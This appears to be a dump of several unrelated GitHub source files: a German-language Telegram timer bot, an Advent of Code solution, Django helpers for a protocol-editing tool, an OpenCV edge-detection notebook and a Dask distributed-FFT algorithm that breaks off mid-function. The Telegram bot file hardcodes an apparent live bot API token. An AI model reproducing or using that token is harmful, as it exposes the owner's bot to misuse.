Tuple\n\nfrom carusel import *\nfrom bot import Bot\nfrom good_words import GoodWords\nfrom user import User\n\n\nbot = Bot(\"5709047064:AAE9QPGMacQ_nlMXVvqq2KICcz0XIJpNWNs\", threaded=True)\n\n\ndef schedule_checker(): # рассылка\n while True:\n schedule.run_pending()\n sleep(1)\n\n\ndef eq_msg(text):\n def f(msg):\n return text == msg.text\n return f\n\n\n@bot.message_handler(commands=['start'])\ndef welcome(message: types.Message):\n markup = helper.MessageHelper.start_markup()\n\n bot.users[message.from_user.id] = User(bot, message.from_user.id)\n bot.send_message(message.from_user.id, \"Hallo\", reply_markup=markup)\n\n\n@bot.message_handler(func=eq_msg(\"Einen Timer hinzufugen\"))\ndef add_timer(msg: types.Message):\n bot.send_message(msg.from_user.id, \"Eintreten die Zeit\", \n reply_markup=helper.MessageHelper.clear_murkup)\n bot.carusels[msg.from_user.id] = HealTimerCarusel(bot, bot.users[msg.from_user.id])\n\n\n@bot.message_handler(func=eq_msg(\"Timer loschen\"))\ndef delete_timer(msg: types.Message):\n markup = types.ReplyKeyboardMarkup(resize_keyboard=True)\n user: User = bot.users[msg.from_user.id]\n timers = user.get_timers()\n \n if not timers:\n bot.reply_to(msg, \"Keine Timer!\")\n return\n for time in timers:\n item = types.KeyboardButton(Time.minuts_to_str(time))\n markup.add(item)\n\n\n bot.carusels[msg.from_user.id] = TimerDeleteCarusel(bot, bot.users[msg.from_user.id])\n bot.reply_to(msg, \"Timer auswahlen\", reply_markup=markup)\n\n\n@bot.message_handler(func=lambda msg: msg.from_user.id in bot.carusels)\ndef handle_carusel(msg: types.Message):\n bot.carusels[msg.from_user.id].step(msg)\n if bot.carusels[msg.from_user.id].is_ready:\n bot.carusels[msg.from_user.id].delete()\n bot.reply_to(msg, GoodWords.get_good_phrase(), \n reply_markup=helper.MessageHelper.start_markup())\n\n\nThread(target=schedule_checker).start()\nbot.polling(none_stop=True)\n","repo_name":"nikita0607/furmut","sub_path":"bot/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39266824404","text":"#!/bin/python3\n\nimport fileinput\n\n\ndef calculateItemPriority(item):\n p = ord(item) - ord('a') + 1\n if p < 0:\n p += 32 + 26\n\n return p\n\ntotal = 0\nrucksacks = [r.strip() for r in open(\"input\").readlines()]\n\ngroups = int(len(rucksacks) / 3)\n\nfor group in range(groups):\n group_rucksacks = rucksacks[group*3:(group+1)*3]\n commonItems = set(group_rucksacks[0])\n for other_rucksack in group_rucksacks[1:]:\n commonItems &= set(other_rucksack)\n\n print(commonItems)\n commonItem = list(commonItems)[0]\n priority = calculateItemPriority(commonItem)\n print(priority)\n total += priority\n\nprint(total)\n","repo_name":"meientau/adventofcode","sub_path":"2022/3/3b.py","file_name":"3b.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12394547602","text":"__author__ = 'beekhuiz'\nfrom .forms import BasicDatasetForm, PartnerForm, PublicationForm, DataReqForm, ExpStepForm, ReportingForm, UserForm, UserProfileForm\nfrom .models import UserProfile, BasicDataset, Partner, Publication, DataReq, ExpStep, Reporting\nfrom django.core.mail import send_mail\nimport datetime\nimport json\n\n\ndef sendEmailConfirmationEditRights(request, datasetID, userProfile):\n '''\n :param request: all request info; needed to retrieve the URL of the page that can now be edited\n :param datasetID: id of the dataset (= protocol) for which editing rights are given\n :param userProfile: the userprofile information of the person that has gained editing rights\n :return: a message stating if an email was send succesfully to the person gaining editing rights\n '''\n coreData = BasicDataset.objects.get(id=datasetID)\n leadUser = coreData.leadUser\n form_link = 'http://' + request.META['HTTP_HOST'] + \"/form/\" + str(datasetID)\n\n # send an email\n htmlMessage = \"<p>Dear \" + userProfile.user.username + ',<br>' + \\\n str(leadUser) + \" has given you the rights to edit the protocol \" + coreData.shortTitle + \".<br>\" + \"Please click \" + \\\n \"<a href=\\\"\"+form_link+\"\\\">HERE</a> to start editing the protocol.<br><br></p>\"\n\n nrMessagesSend = send_mail(subject=\"Edit rights granted for \" + coreData.shortTitle, message=\"\",\n from_email=\"switchon.vwsl@gmail.com\", recipient_list=[str(userProfile.user.email)],\n html_message=htmlMessage)\n\n if nrMessagesSend == 1:\n returnMessage = str(leadUser) + ' has given ' + str(userProfile.user.username) + \" rights to edit the protocol \" + coreData.shortTitle + \". \" + \\\n \"An email has been sent to \" + str(userProfile.user) + \" (\" + str(userProfile.user.email) + \")\" + \" to inform about the new edit rights.\"\n else:\n returnMessage = str(leadUser) + ' has given ' + str(userProfile.user.username) + \" rights to edit the protocol \" + coreData.shortTitle + \". \" + \\\n \"There was an error in sending an email to \" + str(userProfile.user) + \" (\" + str(userProfile.user.email) + \")\" + \" to inform about the new edit rights.\"\n\n return returnMessage\n\n\n\ndef getProtocolInfoInJSON(datasetID):\n '''\n Retrieve all info of a protocol in JSON format, which can be easily read by javascript\n :param datasetID: ID of the dataset (protocol) to get all information from\n :return: dictionary with all information of the dataset\n '''\n\n # Load in data\n experimentInfoDict = getExperimentInfoDict(datasetID)\n partnersList = getPartnersList(datasetID)\n publicationsList = getPublicationsList(datasetID)\n reqsList = getListSteps(datasetID, DataReq)\n expStepsList = getListSteps(datasetID, ExpStep)\n reportingsList = getListSteps(datasetID, Reporting)\n\n context = {}\n context.update({\n 'edit': True,\n 'datasetID': datasetID,\n 'experimentInfoJSON': json.dumps(experimentInfoDict),\n 'partnersJSON': json.dumps(partnersList),\n 'publicationsJSON': json.dumps(publicationsList),\n 'reqsJSON': json.dumps(reqsList),\n 'expStepsJSON': json.dumps(expStepsList),\n 'reportingsJSON': json.dumps(reportingsList),\n })\n\n return context\n\n\ndef getAllFormInfo(datasetID):\n '''\n :param datasetID: ID of the dataset (protocol) to get all information from\n :return: a list of Django forms that are used to create the form HTML-page\n '''\n coreData = BasicDataset.objects.get(id=datasetID)\n formCore = BasicDatasetForm(instance=coreData, auto_id='id_basic_%s')\n\n formPartner = PartnerForm(auto_id='id_partner_%s')\n formDataReq = DataReqForm(auto_id='id_req_%s')\n formExpStep = ExpStepForm(auto_id='id_exp_%s')\n formReporting = ReportingForm(auto_id='id_reporting_%s')\n formPublication = PublicationForm(auto_id='id_publication_%s')\n formList = [\n ['Basic', formCore],\n ['Partner', formPartner],\n ['DataReq', formDataReq],\n ['ExpStep', formExpStep],\n ['Reporting', formReporting],\n ['Publication', formPublication],\n ]\n\n return formList\n\n\ndef updateLastUpdate(datasetID):\n BasicDataset.objects.filter(id=datasetID).update(\n dateLastUpdate=str(datetime.date.today()))\n\ndef createPublicationModelFromClient(postDict, update):\n '''\n Creates a new data Publication model object using an AJAX call from the client\n :param postDict: information of the Partner from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''\n\n # get the foreign key of the protocol dataset of this partner\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n\n if update:\n Publication.objects.filter(id=postDict['publicationID']).update(\n name=postDict['name'],\n type=postDict['type'])\n else:\n # create new partner object\n publicationObj = Publication(\n dataset = dataset,\n name=postDict['name'],\n type=postDict['type']\n )\n publicationObj.save()\n\n updateLastUpdate(postDict['datasetID'])\n\ndef createPartnerModelFromClient(postDict, update):\n '''\n Creates a new data Partner model object using an AJAX call from the client\n :param postDict: information of the Partner from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''\n\n # get the foreign key of the protocol dataset of this partner\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n\n # store the lead as a boolean\n lead = True\n if postDict['lead'] == 'False':\n lead = False\n\n if update:\n Partner.objects.filter(id=postDict['partnerID']).update(\n name=postDict['name'],\n email=postDict['email'],\n organisation=postDict['organisation'],\n lead=lead)\n else:\n # create new partner object\n partnerObj = Partner(\n dataset = dataset,\n name=postDict['name'],\n email=postDict['email'],\n organisation=postDict['organisation'],\n lead=lead\n )\n partnerObj.save()\n\n updateLastUpdate(postDict['datasetID'])\n\n\ndef getExperimentInfoDict(datasetID):\n '''\n Store all experiment information in a dictionary\n :param datasetID: id of the dataset for which the partners are retrieved\n :return: dictionary of experiment info\n '''\n\n existingExpertimentInfo = BasicDataset.objects.get(id=datasetID)\n\n existingExpertimentInfoDict = {\n 'title': existingExpertimentInfo.title,\n 'shortTitle': existingExpertimentInfo.shortTitle,\n 'experimentIdea': existingExpertimentInfo.experimentIdea,\n 'hypothesis': existingExpertimentInfo.hypothesis,\n 'researchObjective': existingExpertimentInfo.researchObjective,\n 'dateLastUpdate': str(existingExpertimentInfo.dateLastUpdate),\n }\n return existingExpertimentInfoDict\n\ndef getPublicationsList(datasetID):\n '''\n Store all publication information in an array list\n :param datasetID: id of the dataset for which the publication are retrieved\n :return: list with all publication\n '''\n\n existingPublications = Publication.objects.filter(dataset__id=datasetID)\n\n existingPublicationsList = []\n for publication in existingPublications:\n publicationDict = {\n \"id\": publication.id,\n \"name\": publication.name,\n \"type\": publication.type,\n }\n existingPublicationsList.append(publicationDict)\n\n return existingPublicationsList\n\ndef getPartnersList(datasetID):\n '''\n Store all partner information in an array list\n :param datasetID: id of the dataset for which the partners are retrieved\n :return: list with all partners\n '''\n\n existingPartners = Partner.objects.filter(dataset__id=datasetID)\n\n existingPartnersList = []\n for partner in existingPartners:\n partnerDict = {\n \"id\": partner.id,\n \"name\": partner.name,\n \"email\": partner.email,\n \"organisation\": partner.organisation,\n \"lead\": str(partner.lead),\n }\n existingPartnersList.append(partnerDict)\n\n return existingPartnersList\n\n\ndef createStepModelFromClient(postDict, update, allObjects):\n '''\n Creates a new Result Reporting model object using an AJAX call from the client\n :param postDict: information of the Result Reporting step from the client\n :param update: boolean indicating whether it is an update or an addition\n :return: none\n '''\n\n dataset = BasicDataset.objects.get(id=postDict['datasetID'])\n partner = Partner.objects.get(id=postDict['partnerID'])\n\n # convert the 'done' checkbox to a boolean\n done = True\n if postDict['done'] == 'False':\n done = False\n\n # Non mandatory field links\n if 'links' in postDict.keys():\n links = postDict['links']\n else:\n links = ''\n\n if update:\n allObjects.objects.filter(id=postDict['stepID']).update(\n dataset = dataset,\n task=postDict['task'],\n properties=postDict['properties'],\n links=links,\n partner = partner,\n deadline=postDict['deadline'],\n done=done\n )\n else:\n # create new exp step object\n newObject = allObjects(\n dataset = dataset,\n task=postDict['task'],\n taskNr=getNewTaskNr(postDict['datasetID'], allObjects),\n properties=postDict['properties'],\n links=links,\n partner = partner,\n deadline=postDict['deadline'],\n done=done\n )\n\n newObject.save()\n\n updateLastUpdate(postDict['datasetID'])\n\n\ndef getListSteps(datasetID, allObjects):\n\n '''\n Convert Django objects to a sorted list of dictionaries for use in the form\n :param datasetID: id of the dataset for which the info are retrieved\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings) that are converted to a list of dics\n :return: sorted list if dictionaries of all objects\n '''\n\n existingObjects = allObjects.objects.filter(dataset__id=datasetID)\n existingObjectsList = []\n\n for existingObject in existingObjects:\n\n objectDict = {\n \"id\": existingObject.id,\n \"taskNr\": existingObject.taskNr,\n \"task\": existingObject.task,\n \"properties\": existingObject.properties,\n \"links\": existingObject.links,\n \"partnerID\": existingObject.partner.id,\n \"partnerName\": existingObject.partner.name,\n \"deadline\": str(existingObject.deadline),\n \"done\": str(existingObject.done),\n }\n\n existingObjectsList.append(objectDict)\n\n # sort on taskNr for better visualisation\n existingObjectsListSorted = sorted(existingObjectsList, key=lambda k: k['taskNr'])\n\n return existingObjectsListSorted\n\n\ndef getNewTaskNr(datasetID, allObjects):\n '''\n Gets a new task number when a new object is added to the list\n :param datasetID: id of the dataset (=protocol)\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: highest task number + 1\n '''\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n\n taskNrs = []\n\n for datasetObject in datasetObjects:\n taskNrs.append(datasetObject.taskNr)\n\n # check if there are already tasks defined; if not, task nr is 1\n if len(taskNrs) > 0:\n return max(taskNrs) + 1\n else:\n return 1\n\n\ndef updateTaskNrs(datasetID, objectID, allObjects):\n '''\n Update the task numbers when a step is deleted\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n deletedObject = allObjects.objects.get(pk=objectID)\n\n taskNrToDel = deletedObject.taskNr\n\n # shift the number of the tasks that come after the task to delete one place up\n for datasetObject in datasetObjects:\n if datasetObject.taskNr > taskNrToDel:\n datasetObject.taskNr -= 1\n datasetObject.save()\n\n\ndef increaseTaskNr(datasetID, objectID, allObjects):\n '''\n Move task one position (task nr) up; thus decrease the task nr. This means that the other task needs to increase the task nr.\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n objectToIncr = allObjects.objects.get(pk=objectID)\n origTaskNr = objectToIncr.taskNr\n\n if origTaskNr > 1:\n\n objectToDecr = allObjects.objects.filter(taskNr=origTaskNr-1, dataset__id = datasetID)[0]\n\n objectToIncr.taskNr = origTaskNr - 1\n objectToIncr.save()\n\n objectToDecr.taskNr = origTaskNr\n objectToDecr.save()\n\n\ndef decreaseTaskNr(datasetID, objectID, allObjects):\n '''\n Move task one position (task nr) down; thus increase the task nr. This means that the other task needs to decrease the task nr.\n :param datasetID: id of the dataset (=protocol)\n :param objectID: the id of the object\n :param allObjects: the objects (i.e. DataReq, ExpSteps or Reportings)\n :return: none\n '''\n\n objectToDecr = allObjects.objects.get(pk=objectID)\n origTaskNr = objectToDecr.taskNr\n\n # get all tasknrs to check if it is the lowest task\n datasetObjects = allObjects.objects.filter(dataset__id=datasetID)\n taskNrs = []\n\n for datasetObject in datasetObjects:\n taskNrs.append(datasetObject.taskNr)\n\n if origTaskNr < max(taskNrs):\n\n objectToIncr = allObjects.objects.filter(taskNr=origTaskNr+1, dataset__id = datasetID)[0]\n\n objectToDecr.taskNr = origTaskNr + 1\n objectToDecr.save()\n\n objectToIncr.taskNr = origTaskNr\n objectToIncr.save()","repo_name":"switchonproject/sip-html5-protocol-tool","sub_path":"protocoltool/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2894010985","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport cv2\nimport os\n\n\n# In[2]:\n\n\nget_ipython().run_line_magic('matplotlib', '')\n\n\n# In[3]:\n\n\nos.getcwd(),os.chdir(r'C:\\Users\\14049\\WordAndStudy\\Projects\\学校\\大三上\\数字图像处理\\数字图像处理实验材料\\测试图像'),os.getcwd()\n\n\n# In[6]:\n\n\ndef cv2ShowImages(imgs):\n for i,img in enumerate(imgs):\n cv2.namedWindow(str(i),cv2.WINDOW_NORMAL)\n cv2.imshow(str(i),img)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n# In[4]:\n\n\nimage = cv2.imread(r'lena.bmp',0)\n\n\n# In[7]:\n\n\n#拉普拉斯边缘检测\nlap = cv2.Laplacian(image,cv2.CV_64F)#拉普拉斯边缘检测\nlap = np.uint8(np.absolute(lap))##对lap去绝对值\n\ncv2ShowImages([image,lap])\n\n\n# In[8]:\n\n\n#Sobel边缘检测\nsobelX = cv2.Sobel(image,cv2.CV_64F,1,0)#x方向的梯度\nsobelY = cv2.Sobel(image,cv2.CV_64F,0,1)#y方向的梯度\n\nsobelX = np.uint8(np.absolute(sobelX))#x方向梯度的绝对值\nsobelY = np.uint8(np.absolute(sobelY))#y方向梯度的绝对值\n\nsobelCombined = cv2.bitwise_or(sobelX,sobelY)#\n\ncv2ShowImages([image,sobelX,sobelY,sobelCombined])\n\n\n# In[9]:\n\n\n#Canny边缘检测\ncanny = cv2.Canny(image,30,150)\ncv2ShowImages([image,canny])\n\n","repo_name":"ZX1209/python-opencv","sub_path":"多媒体技术/python-多媒体技术-边缘检测.py","file_name":"python-多媒体技术-边缘检测.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34991187758","text":"#!/usr/bin/env python\n# coding: utf-8\n# pylint: disable=too-many-locals, too-many-arguments\n\"\"\"\nMain algorithm routine.\nThe functions that conduct the main Dask-implemented algorithm\ninclude the subgrid to facet, and facet to subgrid transformations.\nThe main function calls all the functions.\n\"\"\"\n\nimport argparse\nimport itertools\nimport logging\nimport os\nimport sys\nimport time\n\nimport dask\nimport dask.array\nimport numpy\nfrom distributed import performance_report\nfrom matplotlib import pylab\n\nfrom .dask_wrapper import set_up_dask, tear_down_dask\nfrom .fourier_transform import (\n make_subgrid_and_facet,\n make_subgrid_and_facet_from_hdf5,\n make_subgrid_and_facet_from_sources,\n)\nfrom .fourier_transform.algorithm_parameters import (\n BaseArrays,\n StreamingDistributedFFT,\n)\nfrom .swift_configs import SWIFT_CONFIGS\nfrom .utils import (\n add_two,\n errors_facet_to_subgrid_2d,\n errors_facet_to_subgrid_2d_dask,\n errors_subgrid_to_facet_2d,\n errors_subgrid_to_facet_2d_dask,\n generate_input_data,\n plot_pswf,\n plot_work_terms,\n write_hdf5,\n)\n\nlog = logging.getLogger(\"fourier-logger\")\nlog.setLevel(logging.INFO)\nlog.addHandler(logging.StreamHandler(sys.stdout))\n\n# Plot setup\npylab.rcParams[\"figure.figsize\"] = 16, 4\npylab.rcParams[\"image.cmap\"] = \"viridis\"\n\n\ndef _generate_subgrid_contributions(\n subgrid_2, distr_fft_class, base_arrays, use_dask\n):\n \"\"\"\n Generate the array of individual subgrid contributions to each facet.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param distr_fft_class: StreamingDistributedFFT class\n :param base_arrays: BaseArrays class\n :param use_dask: use dask.delayed or not\n\n :return: subgrid contributions\n \"\"\"\n subgrid_contrib = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n subgrid_contrib = subgrid_contrib.tolist()\n for i0, i1 in itertools.product(\n range(distr_fft_class.nsubgrid), range(distr_fft_class.nsubgrid)\n ):\n AF_AF = distr_fft_class.prepare_subgrid(\n subgrid_2[i0][i1],\n use_dask=use_dask,\n nout=1,\n )\n for j0 in range(distr_fft_class.nfacet):\n NAF_AF = distr_fft_class.extract_subgrid_contrib_to_facet(\n AF_AF,\n distr_fft_class.facet_off[j0],\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for j1 in range(distr_fft_class.nfacet):\n subgrid_contrib[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_subgrid_contrib_to_facet(\n NAF_AF,\n distr_fft_class.facet_off[j1],\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n return subgrid_contrib\n\n\ndef subgrid_to_facet_algorithm(\n subgrid_2,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate facets from subgrids.\n\n :param subgrid_2: 2D numpy array of subgrids\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class\n :param use_dask: use dask.delayed or not\n\n :return: numpy array of approximate facets\n \"\"\"\n naf_naf = _generate_subgrid_contributions(\n subgrid_2,\n distr_fft_class,\n base_arrays,\n use_dask,\n )\n\n approx_facet = numpy.empty(\n (\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.yB_size,\n distr_fft_class.yB_size,\n ),\n dtype=complex,\n )\n if use_dask:\n approx_facet = approx_facet.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n if use_dask:\n MNAF_BMNAF = None\n else:\n MNAF_BMNAF = numpy.zeros(\n (distr_fft_class.yP_size, distr_fft_class.yB_size),\n dtype=complex,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n if use_dask:\n NAF_MNAF = None\n else:\n NAF_MNAF = numpy.zeros(\n (distr_fft_class.xM_yN_size, distr_fft_class.yP_size),\n dtype=complex,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n if use_dask:\n tmp_NAF_MNAF = distr_fft_class.add_subgrid_contribution(\n naf_naf[i0][i1][j0][j1],\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n NAF_MNAF = add_two(\n NAF_MNAF, tmp_NAF_MNAF, use_dask=use_dask, nout=1\n )\n else:\n NAF_MNAF = (\n NAF_MNAF\n + distr_fft_class.add_subgrid_contribution(\n naf_naf[i0][i1][j0][j1],\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n )\n NAF_BMNAF = distr_fft_class.finish_facet(\n NAF_MNAF,\n base_arrays.facet_B[j1],\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=0,\n )\n if use_dask:\n tmp_MNAF_BMNAF = distr_fft_class.add_subgrid_contribution(\n NAF_BMNAF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n MNAF_BMNAF = add_two(\n MNAF_BMNAF, tmp_MNAF_BMNAF, use_dask=use_dask, nout=1\n )\n else:\n MNAF_BMNAF = (\n MNAF_BMNAF\n + distr_fft_class.add_subgrid_contribution(\n NAF_BMNAF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n )\n approx_facet[j0][j1] = distr_fft_class.finish_facet(\n MNAF_BMNAF,\n base_arrays.facet_B[j0],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n\n return approx_facet\n\n\ndef facet_to_subgrid_2d_method_1(\n facet,\n distr_ft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate subgrid from facet 2D. 1st Method.\n\n Approach 1: do prepare_facet step across both axes first,\n then go into the loop over subgrids horizontally\n (axis=0) and within that, loop over subgrids\n vertically (axis=1) and do the extract_subgrid\n step in these two directions\n\n Having those operations separately means that we can shuffle\n things around quite a bit without affecting the result.\n The obvious first choice might be to do all facet-preparation\n up-front, as this allows us to share the computation across all subgrids\n\n :param facet: 2D numpy array of facets\n :param distr_ft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n\n NMBF_NMBF = numpy.empty(\n (\n distr_ft_class.nsubgrid,\n distr_ft_class.nsubgrid,\n distr_ft_class.nfacet,\n distr_ft_class.nfacet,\n distr_ft_class.xM_yN_size,\n distr_ft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_ft_class.nfacet), range(distr_ft_class.nfacet)\n ):\n BF_F = distr_ft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n BF_BF = distr_ft_class.prepare_facet(\n BF_F,\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_ft_class.nsubgrid):\n NMBF_BF = distr_ft_class.extract_facet_contrib_to_subgrid(\n BF_BF,\n distr_ft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_ft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_ft_class.extract_facet_contrib_to_subgrid(\n NMBF_BF,\n distr_ft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_ft_class, base_arrays, use_dask=use_dask\n )\n\n return approx_subgrid\n\n\ndef facet_to_subgrid_2d_method_2(\n facet,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Approach 2: First, do prepare_facet on the horizontal axis\n (axis=0), then for loop for the horizontal subgrid direction,\n and do extract_subgrid within same loop do prepare_facet\n in the vertical case (axis=1), then go into the fila subgrid\n loop in the vertical dir and do extract_subgrid for that\n\n However, remember that `prepare_facet` increases the amount of data\n involved, which in turn means that we need to shuffle more data through\n subsequent computations. Therefore it is actually more efficient to first\n do the subgrid-specific reduction, and *then* continue with the (constant)\n facet preparation along the other axis. We can tackle both axes in whatever\n order we like, it doesn't make a difference for the result.\n\n :param facet: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n NMBF_NMBF = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n BF_F = distr_fft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n NMBF_F = distr_fft_class.extract_facet_contrib_to_subgrid(\n BF_F,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n NMBF_BF = distr_fft_class.prepare_facet(\n NMBF_F,\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_facet_contrib_to_subgrid(\n NMBF_BF,\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=use_dask\n )\n\n return approx_subgrid\n\n\ndef facet_to_subgrid_2d_method_3(\n facet,\n distr_fft_class,\n base_arrays,\n use_dask=False,\n):\n \"\"\"\n Generate subgrid from facet 2D. 3rd Method.\n\n Approach 3: same as 2, but starts with the vertical direction (axis=1)\n and finishes with the horizontal (axis=0) axis\n\n :param facet: 2D numpy array of facets\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n\n :return: approximate subgrid array (subgrids derived from facets)\n \"\"\"\n NMBF_NMBF = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.nfacet,\n distr_fft_class.nfacet,\n distr_fft_class.xM_yN_size,\n distr_fft_class.xM_yN_size,\n ),\n dtype=complex,\n )\n if use_dask:\n NMBF_NMBF = NMBF_NMBF.tolist()\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n F_BF = distr_fft_class.prepare_facet(\n facet[j0][j1],\n base_arrays.Fb,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n for i1 in range(distr_fft_class.nsubgrid):\n F_NMBF = distr_fft_class.extract_facet_contrib_to_subgrid(\n F_BF,\n distr_fft_class.subgrid_off[i1],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=1,\n use_dask=use_dask,\n nout=1,\n )\n BF_NMBF = distr_fft_class.prepare_facet(\n F_NMBF,\n base_arrays.Fb,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n for i0 in range(distr_fft_class.nsubgrid):\n NMBF_NMBF[i0][i1][j0][\n j1\n ] = distr_fft_class.extract_facet_contrib_to_subgrid(\n BF_NMBF,\n distr_fft_class.subgrid_off[i0],\n base_arrays.facet_m0_trunc,\n base_arrays.Fn,\n axis=0,\n use_dask=use_dask,\n nout=1,\n )\n approx_subgrid = generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=use_dask\n )\n return approx_subgrid\n\n\ndef generate_approx_subgrid(\n NMBF_NMBF, distr_fft_class, base_arrays, use_dask=False\n):\n \"\"\"\n Finish generating subgrids from facets.\n\n :param NMBF_NMBF: array of individual facet contributions\n :param distr_fft_class: StreamingDistributedFFT class object\n :param base_arrays: BaseArrays class object\n :param use_dask: use dask.delayed or not\n \"\"\"\n approx_subgrid = numpy.empty(\n (\n distr_fft_class.nsubgrid,\n distr_fft_class.nsubgrid,\n distr_fft_class.xA_size,\n distr_fft_class.xA_size,\n ),\n dtype=complex,\n )\n if use_dask:\n approx_subgrid = approx_subgrid.tolist()\n\n for i0, i1 in itertools.product(\n range(distr_fft_class.nsubgrid), range(distr_fft_class.nsubgrid)\n ):\n summed_facet = numpy.zeros(\n (distr_fft_class.xM_size, distr_fft_class.xM_size), dtype=complex\n )\n if use_dask:\n summed_facet = None\n\n for j0, j1 in itertools.product(\n range(distr_fft_class.nfacet), range(distr_fft_class.nfacet)\n ):\n tmp_axis_0 = distr_fft_class.add_facet_contribution(\n 